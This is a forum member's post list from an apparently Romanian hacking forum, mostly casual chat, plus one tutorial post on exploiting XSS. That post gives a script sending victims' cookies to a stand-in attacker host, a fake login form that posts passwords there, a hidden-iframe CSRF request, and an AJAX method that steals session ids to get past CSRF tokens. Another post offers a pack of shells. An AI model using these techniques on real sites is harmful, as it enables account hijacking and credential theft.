Jump to content

moubik

Active Members
  • Posts

    1261
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by moubik

  1. cand ajung acasa o sa pun un pack cu toate shell-urile pe care le am. sunt putin peste 30 parca
  2. mi-am dat seama ca pentru keylogger in ajax o sa ai probleme la cross-domain requests. am incercat sa fac pentru youtube un poc care sa delogheze user-ul, si dupa aceea sa scrie formular de login si sa obtina parola din autocomplete. dar nu-mi facea iexplore autocomplete decat dupa ce scriam user-ul. am incercat cu ie6
  3. problema nu este mare multumesc pentru cat hosting am avut pana acum. (facem offtopic )
  4. din pacate mi-a picat vineri websecurity.ro unde aveam un proof of concept care arata cum sa citesti mailul unei persoane pornind doar de la un XSS. desi ei nu salveaza permanent cookies si salveaza doar cookie, de sesiune se poate face asta. incerc sa explic cat mai pe larg. Pornind de la un XSS cam ce poti face ? 1. poti sa introduci cod de genul: <script>document.location='http://hacker.site.com/grabber.php?c='+document.cookie</script> Cod care fura un cookie al persoanei logate. Bineinteles exista metode de ascundere a acestui request (iframe, frameset), pe care nu le voi explica acum. 2. poti sa faci deface xss la site: <script>document.write('<h1>You have been hacked by RST</h1>')</script> Care, in functie de tipul XSS-ului permanent (daca postezi codul si ramane in pagina) sau temporar (daca dai cuiva linkul si acesta il click-uieste) are efecte mai mult sau mai putin spectaculoase. -variatiune pe aceasta idee: ca tehnica de phishing scrii in site, in loc de 'hacked by ...' formular de logare care sa semene cat mai mult cu formularul site-ului. deci sa para cat mai adevarat. dar in loc de a face POST/GET catre login-ul lor, face POST/GET catre http://hacker.site.com/grabber.php?user=[userul introdus]&pass=[parola introdusa] 3. saptamana trecuta mi-am dat seama ca pot sa ma joc chiar mai mult. si am incercat sa introduc ajax. da, ajax. pot sa introduc ajax si astfel sa fac request-uri in numele userului care a accesat link-ul cu XSS in el. ce poate face acest ajax ? -pai cum spuneam mai sus. poate citi informatii de pe o pagina, repet, in numele userului logat, si poate returna aceste informatii pe site-ul hackerului. eu facusem sa citeasca primul mail al persoanei logate pe home.ro (cativa membrii rst au vazut exploit-ul in actiune) -poate extinde tehnica de phishing delogand userul inainte de a-i cere sa se relogheze in site. -poate trece de protectii CSRF. Probabil ca multi nu stiu cum se face protectie CSRF. Sa spun cum se exploateaza CSRF-ul inainte. avem un forum. si la acest forum daca un admin creaza un nou admin pentru site, intr-un final ajunge la un link de genul: http://forum.com/addadmin.php?user=rstuser In acest script php se verifica daca exista userul "rstuser" si dupa aceea i se atribuie permisiuni de administrator. Cum se poate expoata acest bug ? (ca este un bug ) Eu sunt user pe acel forum si pacalesc adminul sa intre pe link-ul http://forum.com/addadmin.php?user=moubik in acel moment eu am fost adaugat ca administrator. precizez, acest request poate fi ascuns intr-un site in genul: <iframe src="http://forum.com/addadmin.php?user=moubik" height="0" width="0" border="0" frameborder="0"></iframe> Cum se protejeaza oamenii de CSRF ? o tehnica este sa se creeze un id unic ce va fi trimis o data cu requestul de adaugare administrator. exemplu <form action="addadmin.php" method="GET"> <input type="text" name="user"> <input type="hidden" name="sid" value="aici se pune sessioid"> </form> formularul se genereaza automat la fiecare afisare de pagina si la value se pune $_COOKIE['PHPSESSID'] astfel atunci cand adminul chiar vrea sa adauge pe cineva ca administrator, link-ul va fi in genul: http://forum.com/addadmin.php?user=rstuser&sid=1234567890 mai departe, inainte de a se face adaugarea user-ului ca administrator se face o verificare in php de genul: if ($_GET['sid'] != $_COOKIE['PHPSESSID']) { echo "You are a hacker, please leave!"; } else { // se adauga user-ul ca administrator } cum poate tehnica aceasta sa treaca de modul de protejare CSRF tocmai prezentat ? pai cum ziceam, pot sa extrag informatii in numele user-ului pe care il atac. pasii scriptului sunt in genul: 1. iau o pagina care stiu ca o sa contina sessionid (daca va uitati pe forumurile phpbb o sa vedeti ca aproape orice pagina contine aceasta informatie) 2. extrag variabila ce ma intereseaza pe mine 3. creez linkul, care de data aceasta va fi valid. repet linkul acum valid, si care trece de protectia csrf arata asa: http://forum.com/addadmin.php?user=moubik&sid=1234567890 dar acum user-ul trimis va fi al hacker-ului. 4. tot cu ajax pot sa fac request-ul. si astfel dintr-un singur foc, se poate face toata aceasta chestie. trebuie sa programezi pentru fiecare pagina cod propriu, pentru ca trebuie extrase informatiile, parsate, si creat link-ul final ce va fi executat. bineinteles in javascript -ce mai poate face aceasta tehnica ? pai (ideea este a lui x.o) keylogger in ajax (bineinteles numai in acea pagina) -am incercat, dar deocamdata nu am reusit sa gasesc un site vulnerabil la acest lucru. sa va spun la ce m-am mai gandit. browserele fac autocomplete. request-ul ajax poate face delogarea userului, si dupa aceea sa scrie in pagina form-ularul de login. cu unele browsere cu anumite optiuni fac acest lucru, ajax-ul ar putea sa extraga informatia din form-urile de login, chiar fara sa dea submit/login user-ul nu sariti pe mine, daca tehnica aceasta au mai folosit-o 1milion de oameni inaintea mea. eu am descoperit-o si am analizat-o singur. cum vi se pare ?
  5. te cred goodkat
  6. moubik

    Retragere

    Pure mathematics is, in its way, the poetry of logical ideas. ~Albert Einstein
  7. si tu ce forum recomanzi ? parerea mea e ca phpbb e cel mai bun. este intradevar cel mai popular, si de aceea cel mai atacat. multe buguri sunt reparate, unele nu sunt publice. nu mi se pare corect sa dai vina pe un produs care este momentan cel mai popular, cel mai featured(din cate stiu eu)si gratis. citeste licenta GPL. acolo spune ca orice s-ar intampla, programatorii nu pot fi trasi la raspundere. nimeni nu ii obliga sa puna phpbb, sa-si scrie forum daca doresc.
  8. ras, am vazut ca te implici RST nu se prabuseste. potoliti-va cu glumele tampite. intradevar Nemesis a ridicat mult rst. dar mai sunt si altii care au ridicat rst si nu se stie de ei, sau nu au fost apreciati. vara a trecut, unii oameni se axeaza mai mult pe scoala acum dar RST nu moare. nu inteleg pe ce forum ai stat tu in ultimul timp, ca s-au postat lucruri interesante si s-au facut lucruri interesante. incearca sa deosebesti scaderea in importanta si valoare de sindromul celui de-al doilea album.
  9. tu l-ai incercat ? ca eu l-am incercat si nu trimite mail..
  10. poti sa faci si o mica descriere ?
  11. moubik

    Salut

    salut, kagula!
  12. bucurati-va de fiecare moment. nu ati ajuns niciodata la un chef in care vorbiti cu oamenii si va aduceti aminte de momente frumoase ? poate ca asta e tot ce ne ramane dupa viata. eu nu stiu sunt tanar, am 21 de ani. dar momentele trebuie pretuite. atat stiu deocamdata.
  13. moubik

    concluzie

    bah, tu esti dus ? ce te-a apucat ?
  14. ce m-a enervat a fost modul in care ai formulat titlul thread-ului. titlul trebuie in primul rand sa reprezinte un rezumat, sau ideea principala a intrebarii/cererii. mutat la gunoi
  15. da, dar vezi tu, noscript e la nivel de user. in site tot apar xssurile. (sorry for bumping)
  16. moubik

    LOL

    facusem niste modificari la cookies si m-am trezit ca sunt logat cu 2 useri:
  17. ba? stii ce io-mi bag pula. nu mai suport sa vad thread-uri cu PLS HELP1!!!!, AJUTOOOOOOOOOOOOOOR!!!!! pana acum am tot zis sa formulati altfel threadurile. am dat si un articol (nu e scris de mine) in care se explica cum sa pui intrebari. so fuck off!
  18. m-am blocat la nivelul 8. e o imagine care pare sa nu existe
  19. sincer nu cred ca ar merge pe 300mhz la o viteza acceptabila. o sa incerc python sa vad. un ide poti sa-mi recomanzi ?
  20. mi se par destule topicurile acum... nu stiu ce sa zic...
  21. anul trecut cand am comandat cd cu ubuntu, am vazut ca minimul era de 5 cd-uri (parca). deci nu puteam sa primesc doar unul. ce am facut cu celelalte 4 si cu stickerele primite ? le-am dat prietenilor. in scurt timp toti au incercat ubuntu. unii chiar si-au lipit stickerul pe pc. din punctul meu de vedere a fost chiar buna chestia pentru ubuntu. mai multi oameni l-au putut incerca. desi au avut frica aceea de linux, aveau deja cd-ul in mana. nu-i costa prea mult daca il si incercau. initial gandeau: "De ce sa-mi downloadez Ubuntu? Oricum nu stiu sa folosesc linux." si ideea ramanea asa. cand au avut cd-ul in brate, au zis: "Ok, let's give it a try!" asa ca lasa frustrarile deoparte. (tw8 nu te simti atacat, vorbesc cu unix.vali)
  22. ahh, lol, am uitat sa spun ca trebuie sa aiba posibilitatea sa scrie pe COM/LPT. am cautat pe forum si pe net despre autoit, dar nu am gasit. ai folosit cumva asta cu autoit ?
  23. chestia e ca nu e aplicatie web. este aplicatie binara. deci executabil. si full screen sa fie fullscreen. n-am nici o treaba cu google
  24. din cate am vazut eu scripting languages merg destul de slow chiar si pe sisteme ok. python zici ca e mai bun... hmm o sa incerc
  25. am un sistem cu 300mhz, 256mb, si pot pune pe el windows. trebuie sa fac o aplicatie care sa poata folosi full-screen si sa stie sa afiseze imagini (bmp, jpeg, gif <- 1 tip din astea) nu-mi trebuie directx, opengl. imi trebuie numai 2d. nu pot sa schimb sistemul pe care o sa-l rulez. sugestii ?
×
×
  • Create New...